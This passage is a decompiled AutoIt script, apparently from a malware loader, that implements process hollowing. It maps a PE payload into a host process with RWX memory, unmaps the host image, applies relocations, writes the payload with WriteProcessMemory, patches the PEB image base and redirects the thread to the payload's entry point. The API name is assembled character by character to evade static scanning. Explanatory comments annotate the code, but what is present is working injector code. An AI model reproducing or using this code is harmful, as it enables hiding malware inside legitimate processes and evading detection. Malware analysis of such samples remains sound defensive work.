    LOCAL $23=DLLSTRUCTCREATE("char Magic[2];"&"word BytesOnLastPage;"&"word Pages;"&"word Relocations;"&"word SizeofHeader;"&"word MinimumExtra;"&"word MaximumExtra;"&"word SS;"&"word SP;"&"word Checksum;"&"word IP;"&"word CS;"&"word Relocation;"&"word Overlay;"&"char Reserved[8];"&"word OEMIdentifier;"&"word OEMInformation;"&"char Reserved2[20];"&"dword AddressOfNewExeHeader",$1T)
    LOCAL $24=$1T
    $1T+=DLLSTRUCTGETDATA($23,"AddressOfNewExeHeader")
    LOCAL $25=DLLSTRUCTGETDATA($23,"Magic")
    IF NOT ($25=="MZ")THEN
        DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
        RETURN SETERROR(4,0,0)
    ENDIF
    LOCAL $26=DLLSTRUCTCREATE("dword Signature",$1T)
    $1T+=4
    IF DLLSTRUCTGETDATA($26,"Signature")<>17744 THEN
        DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
        RETURN SETERROR(5,0,0)
    ENDIF
    LOCAL $27=DLLSTRUCTCREATE("word Machine;"&"word NumberOfSections;"&"dword TimeDateStamp;"&"dword PointerToSymbolTable;"&"dword NumberOfSymbols;"&"word SizeOfOptionalHeader;"&"word Characteristics",$1T)
    LOCAL $28=DLLSTRUCTGETDATA($27,"NumberOfSections")
    $1T+=20
    LOCAL $29=DLLSTRUCTCREATE("word Magic;",$1T)
    LOCAL $2A=DLLSTRUCTGETDATA($29,1)
    LOCAL $2B
    IF $2A=267 THEN
        IF $1Q THEN
            DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
            RETURN SETERROR(6,0,0)
        ENDIF
        $2B=DLLSTRUCTCREATE("word Magic;"&"byte MajorLinkerVersion;"&"byte MinorLinkerVersion;"&"dword SizeOfCode;"&"dword SizeOfInitializedData;"&"dword SizeOfUninitializedData;"&"dword AddressOfEntryPoint;"&"dword BaseOfCode;"&"dword BaseOfData;"&"dword ImageBase;"&"dword SectionAlignment;"&"dword FileAlignment;"&"word MajorOperatingSystemVersion;"&"word MinorOperatingSystemVersion;"&"word MajorImageVersion;"&"word MinorImageVersion;"&"word MajorSubsystemVersion;"&"word MinorSubsystemVersion;"&"dword Win32VersionValue;"&"dword SizeOfImage;"&"dword SizeOfHeaders;"&"dword CheckSum;"&"word Subsystem;"&"word DllCharacteristics;"&"dword SizeOfStackReserve;"&"dword SizeOfStackCommit;"&"dword SizeOfHeapReserve;"&"dword SizeOfHeapCommit;"&"dword LoaderFlags;"&"dword NumberOfRvaAndSizes",$1T)
        $1T+=96
    ELSEIF $2A=523 THEN
        IF NOT $1Q THEN
            DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
            RETURN SETERROR(6,0,0)
        ENDIF
        $2B=DLLSTRUCTCREATE("word Magic;"&"byte MajorLinkerVersion;"&"byte MinorLinkerVersion;"&"dword SizeOfCode;"&"dword SizeOfInitializedData;"&"dword SizeOfUninitializedData;"&"dword AddressOfEntryPoint;"&"dword BaseOfCode;"&"uint64 ImageBase;"&"dword SectionAlignment;"&"dword FileAlignment;"&"word MajorOperatingSystemVersion;"&"word MinorOperatingSystemVersion;"&"word MajorImageVersion;"&"word MinorImageVersion;"&"word MajorSubsystemVersion;"&"word MinorSubsystemVersion;"&"dword Win32VersionValue;"&"dword SizeOfImage;"&"dword SizeOfHeaders;"&"dword CheckSum;"&"word Subsystem;"&"word DllCharacteristics;"&"uint64 SizeOfStackReserve;"&"uint64 SizeOfStackCommit;"&"uint64 SizeOfHeapReserve;"&"uint64 SizeOfHeapCommit;"&"dword LoaderFlags;"&"dword NumberOfRvaAndSizes",$1T)
        $1T+=112
    ELSE
        DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
        RETURN SETERROR(6,0,0)
    ENDIF
    LOCAL $2C=DLLSTRUCTGETDATA($2B,"AddressOfEntryPoint")
    LOCAL $2D=DLLSTRUCTGETDATA($2B,"SizeOfHeaders")
    LOCAL $2E=DLLSTRUCTGETDATA($2B,"ImageBase")
    LOCAL $2F=DLLSTRUCTGETDATA($2B,"SizeOfImage")
    ; Skip data directories 0..4 (export, import, resource, exception, security);
    ; $1T now points at entry 5, the base-relocation directory.
    $1T+=8
    $1T+=8
    $1T+=24
    LOCAL $2G=DLLSTRUCTCREATE("dword VirtualAddress; dword Size",$1T)
    LOCAL $2H=DLLSTRUCTGETDATA($2G,"VirtualAddress")
    LOCAL $2I=DLLSTRUCTGETDATA($2G,"Size")
    LOCAL $2J
    IF $2H AND $2I THEN $2J=TRUE
    IF NOT $2J THEN CONSOLEWRITE("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!"&@CRLF)
    ; Skip the remaining 11 directory entries (11 * 8) to reach the section headers.
    $1T+=88
    ; $2K: relocations will be applied; $2L: base address chosen in the host.
    LOCAL $2K
    LOCAL $2L
    IF $2J THEN
        $2L=_6K($1X,$2F)
        IF @ERROR THEN
            $2L=_6J($1X,$2E,$2F)
            IF @ERROR THEN
                _6L($1X,$2E)
                $2L=_6J($1X,$2E,$2F)
                IF @ERROR THEN
                    DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
                    RETURN SETERROR(101,1,0)
                ENDIF
            ENDIF
        ENDIF
        $2K=TRUE
    ELSE
        $2L=_6J($1X,$2E,$2F)
        IF @ERROR THEN
            _6L($1X,$2E)
            $2L=_6J($1X,$2E,$2F)
            IF @ERROR THEN
                DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
                RETURN SETERROR(101,0,0)
            ENDIF
        ENDIF
    ENDIF
    ; Rewrite ImageBase in the copied headers to the address actually obtained.
    DLLSTRUCTSETDATA($2B,"ImageBase",$2L)
    ; $2M/$2N: local staging buffer of SizeOfImage bytes, headers first.
    LOCAL $2M=DLLSTRUCTCREATE("byte["&$2F&"]")
    LOCAL $2N=DLLSTRUCTGETPTR($2M)
    LOCAL $2O=DLLSTRUCTCREATE("byte["&$2D&"]",$24)
    DLLSTRUCTSETDATA($2M,1,DLLSTRUCTGETDATA($2O,1))
    LOCAL $2P
    LOCAL $2Q,$2R
    LOCAL $2S,$2T
    LOCAL $2U
    ; Copy each section's raw data (clamped to VirtualSize when smaller) to its RVA;
    ; remember where the relocation table lives in the raw file ($2U).
    FOR $2V=1 TO $28
        $2P=DLLSTRUCTCREATE("char Name[8];"&"dword UnionOfVirtualSizeAndPhysicalAddress;"&"dword VirtualAddress;"&"dword SizeOfRawData;"&"dword PointerToRawData;"&"dword PointerToRelocations;"&"dword PointerToLinenumbers;"&"word NumberOfRelocations;"&"word NumberOfLinenumbers;"&"dword Characteristics",$1T)
        $2Q=DLLSTRUCTGETDATA($2P,"SizeOfRawData")
        $2R=$24+DLLSTRUCTGETDATA($2P,"PointerToRawData")
        $2S=DLLSTRUCTGETDATA($2P,"VirtualAddress")
        $2T=DLLSTRUCTGETDATA($2P,"UnionOfVirtualSizeAndPhysicalAddress")
        IF $2T AND $2T<$2Q THEN $2Q=$2T
        IF $2Q THEN
            DLLSTRUCTSETDATA(DLLSTRUCTCREATE("byte["&$2Q&"]",$2N+$2S),1,DLLSTRUCTGETDATA(DLLSTRUCTCREATE("byte["&$2Q&"]",$2R),1))
        ENDIF
        IF $2K THEN
            IF $2S<=$2H AND $2S+$2Q>$2H THEN
                $2U=DLLSTRUCTCREATE("byte["&$2I&"]",$2R+($2H-$2S))
            ENDIF
        ENDIF
        $1T+=40
    NEXT
    IF $2K THEN _6I($2N,$2U,$2L,$2E,$2A=523)
    ; WriteProcessMemory(host, $2L, staged image, SizeOfImage) — name obfuscated via _6H.
    $1W=DLLCALL("kernel32.dll","bool",_6H(),"handle",$1X,"ptr",$2L,"ptr",$2N,"dword_ptr",$2F,"dword_ptr*",0)
    IF @ERROR OR NOT $1W[0]THEN
        DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
        RETURN SETERROR(7,0,0)
    ENDIF
    ; Read the host PEB, patch ImageBaseAddress to the injected image, write it back.
    LOCAL $2W=DLLSTRUCTCREATE("byte InheritedAddressSpace;"&"byte ReadImageFileExecOptions;"&"byte BeingDebugged;"&"byte Spare;"&"ptr Mutant;"&"ptr ImageBaseAddress;"&"ptr LoaderData;"&"ptr ProcessParameters;"&"ptr SubSystemData;"&"ptr ProcessHeap;"&"ptr FastPebLock;"&"ptr FastPebLockRoutine;"&"ptr FastPebUnlockRoutine;"&"dword EnvironmentUpdateCount;"&"ptr KernelCallbackTable;"&"ptr EventLogSection;"&"ptr EventLog;"&"ptr FreeList;"&"dword TlsExpansionCounter;"&"ptr TlsBitmap;"&"dword TlsBitmapBits[2];"&"ptr ReadOnlySharedMemoryBase;"&"ptr ReadOnlySharedMemoryHeap;"&"ptr ReadOnlyStaticServerData;"&"ptr AnsiCodePageData;"&"ptr OemCodePageData;"&"ptr UnicodeCaseTableData;"&"dword NumberOfProcessors;"&"dword NtGlobalFlag;"&"byte Spare2[4];"&"int64 CriticalSectionTimeout;"&"dword HeapSegmentReserve;"&"dword HeapSegmentCommit;"&"dword HeapDeCommitTotalFreeThreshold;"&"dword HeapDeCommitFreeBlockThreshold;"&"dword NumberOfHeaps;"&"dword MaximumNumberOfHeaps;"&"ptr ProcessHeaps;"&"ptr GdiSharedHandleTable;"&"ptr ProcessStarterHelper;"&"ptr GdiDCAttributeList;"&"ptr LoaderLock;"&"dword OSMajorVersion;"&"dword OSMinorVersion;"&"dword OSBuildNumber;"&"dword OSPlatformId;"&"dword ImageSubSystem;"&"dword ImageSubSystemMajorVersion;"&"dword ImageSubSystemMinorVersion;"&"dword GdiHandleBuffer[34];"&"dword PostProcessInitRoutine;"&"dword TlsExpansionBitmap;"&"byte TlsExpansionBitmapBits[128];"&"dword SessionId")
    $1W=DLLCALL("kernel32.dll","bool","ReadProcessMemory","ptr",$1X,"ptr",$22,"ptr",DLLSTRUCTGETPTR($2W),"dword_ptr",DLLSTRUCTGETSIZE($2W),"dword_ptr*",0)
    IF @ERROR OR NOT $1W[0]THEN
        DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
        RETURN SETERROR(8,0,0)
    ENDIF
    DLLSTRUCTSETDATA($2W,"ImageBaseAddress",$2L)
    $1W=DLLCALL("kernel32.dll","bool",_6H(),"handle",$1X,"ptr",$22,"ptr",DLLSTRUCTGETPTR($2W),"dword_ptr",DLLSTRUCTGETSIZE($2W),"dword_ptr*",0)
    IF @ERROR OR NOT $1W[0]THEN
        DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
        RETURN SETERROR(9,0,0)
    ENDIF
    ; Redirect the initial thread to the injected entry point (EAX on x86, RCX on AMD64).
    SWITCH $1Z
        CASE 1
            DLLSTRUCTSETDATA($20,"Eax",$2L+$2C)
        CASE 2
            DLLSTRUCTSETDATA($20,"Rcx",$2L+$2C)
        CASE 3
    ENDSWITCH
    $1W=DLLCALL("kernel32.dll","bool","SetThreadContext","handle",$1Y,"ptr",DLLSTRUCTGETPTR($20))
    IF @ERROR OR NOT $1W[0]THEN
        DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
        RETURN SETERROR(10,0,0)
    ENDIF
    $1W=DLLCALL("kernel32.dll","dword","ResumeThread","handle",$1Y)
    IF @ERROR OR $1W[0]=-1 THEN
        DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
        RETURN SETERROR(11,0,0)
    ENDIF
    DLLCALL("kernel32.dll","bool","CloseHandle","handle",$1X)
    DLLCALL("kernel32.dll","bool","CloseHandle","handle",$1Y)
    RETURN DLLSTRUCTGETDATA($1V,"ProcessId")
ENDFUNC

; Returns "WriteProcessMemory", assembled one character at a time so the API name
; does not appear as a contiguous string in the compiled script (static-scan evasion).
FUNC _6H()
    LOCAL $2X[18]=["W","r","i","t","e","P","r","o","c","e","s","s","M","e","m","o","r","y"],$2Y
    FOR $2Z IN $2X
        $2Y&=$2Z
    NEXT
    RETURN $2Y
ENDFUNC

; Applies the IMAGE_BASE_RELOCATION blocks in $30 to the locally staged image at $2N.
;   delta $34 = $31 (base obtained in the host) - $32 (preferred ImageBase)
;   $33 is True for PE32+, so $12 = 10 (IMAGE_REL_BASED_DIR64); otherwise $12 = 3
;   (IMAGE_REL_BASED_HIGHLOW). Entries of any other type are ignored.
; $38 (offset into the table) is declared without a value and relies on AutoIt's
; empty-to-zero comparison on the first pass — reproduced as decompiled.
FUNC _6I($2N,$30,$31,$32,$33)
    LOCAL $34=$31-$32
    LOCAL $35=DLLSTRUCTGETSIZE($30)
    LOCAL $36=DLLSTRUCTGETPTR($30)
    LOCAL $37,$38
    LOCAL $2S,$39,$3A
    LOCAL $3B,$3C,$3D
    LOCAL $12=3+7*$33
    WHILE $38<$35
        $37=DLLSTRUCTCREATE("dword VirtualAddress; dword SizeOfBlock",$36+$38)
        $2S=DLLSTRUCTGETDATA($37,"VirtualAddress")
        $39=DLLSTRUCTGETDATA($37,"SizeOfBlock")
        ; Number of 16-bit entries after the 8-byte block header.
        $3A=($39-8)/2
        $3B=DLLSTRUCTCREATE("word["&$3A&"]",DLLSTRUCTGETPTR($37)+8)
        FOR $2V=1 TO $3A
            $3C=DLLSTRUCTGETDATA($3B,1,$2V)
            ; High 4 bits = type, low 12 bits = offset within the 4 KiB page.
            IF BITSHIFT($3C,12)=$12 THEN
                $3D=DLLSTRUCTCREATE("ptr",$2N+$2S+BITAND($3C,4095))
                DLLSTRUCTSETDATA($3D,1,DLLSTRUCTGETDATA($3D,1)+$34)
            ENDIF
        NEXT
        $38+=$39
    WEND
    RETURN 1
ENDFUNC

; VirtualAllocEx at a fixed address $3E for $35 bytes, PAGE_EXECUTE_READWRITE (64):
; first MEM_COMMIT (4096 = 0x1000), then MEM_COMMIT|MEM_RESERVE (12288 = 0x3000).
; Returns the address, or 0 with @error = 1.
FUNC _6J($1X,$3E,$35)
    LOCAL $1W=DLLCALL("kernel32.dll","ptr","VirtualAllocEx","handle",$1X,"ptr",$3E,"dword_ptr",$35,"dword",4096,"dword",64)
    IF @ERROR OR NOT $1W[0]THEN
        $1W=DLLCALL("kernel32.dll","ptr","VirtualAllocEx","handle",$1X,"ptr",$3E,"dword_ptr",$35,"dword",12288,"dword",64)
        IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
    ENDIF
    RETURN $1W[0]
ENDFUNC

; VirtualAllocEx anywhere in the host: $35 bytes, MEM_COMMIT|MEM_RESERVE,
; PAGE_EXECUTE_READWRITE. Returns the address, or 0 with @error = 1.
FUNC _6K($1X,$35)
    LOCAL $1W=DLLCALL("kernel32.dll","ptr","VirtualAllocEx","handle",$1X,"ptr",0,"dword_ptr",$35,"dword_ptr",$35,"dword",12288,"dword",64)
    IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
    RETURN $1W[0]
ENDFUNC

; NtUnmapViewOfSection(host, $3E): evicts the host's own mapped image so the payload
; can be placed at its preferred ImageBase. The NTSTATUS is not checked — only a
; DllCall failure sets @error.
FUNC _6L($1X,$3E)
    DLLCALL("ntdll.dll","int","NtUnmapViewOfSection","ptr",$1X,"ptr",$3E)
    IF @ERROR THEN RETURN SETERROR(1,0,0)
    RETURN 1
ENDFUNC

; IsWow64Process(host): returns the Wow64Process out-parameter, or 0 with @error = 1.
; Used by _6G to refuse a 32-bit host when AutoIt itself is 64-bit.
FUNC _6M($1X)
    LOCAL $1W=DLLCALL("kernel32.dll","bool","IsWow64Process","handle",$1X,"bool*",0)
    IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
    RETURN $1W[2]
ENDFUNC
; DeTokenise by myAut2Exe >The Open Source AutoIT/AutoHotKey script decompiler< - dmod 2.12 build(269)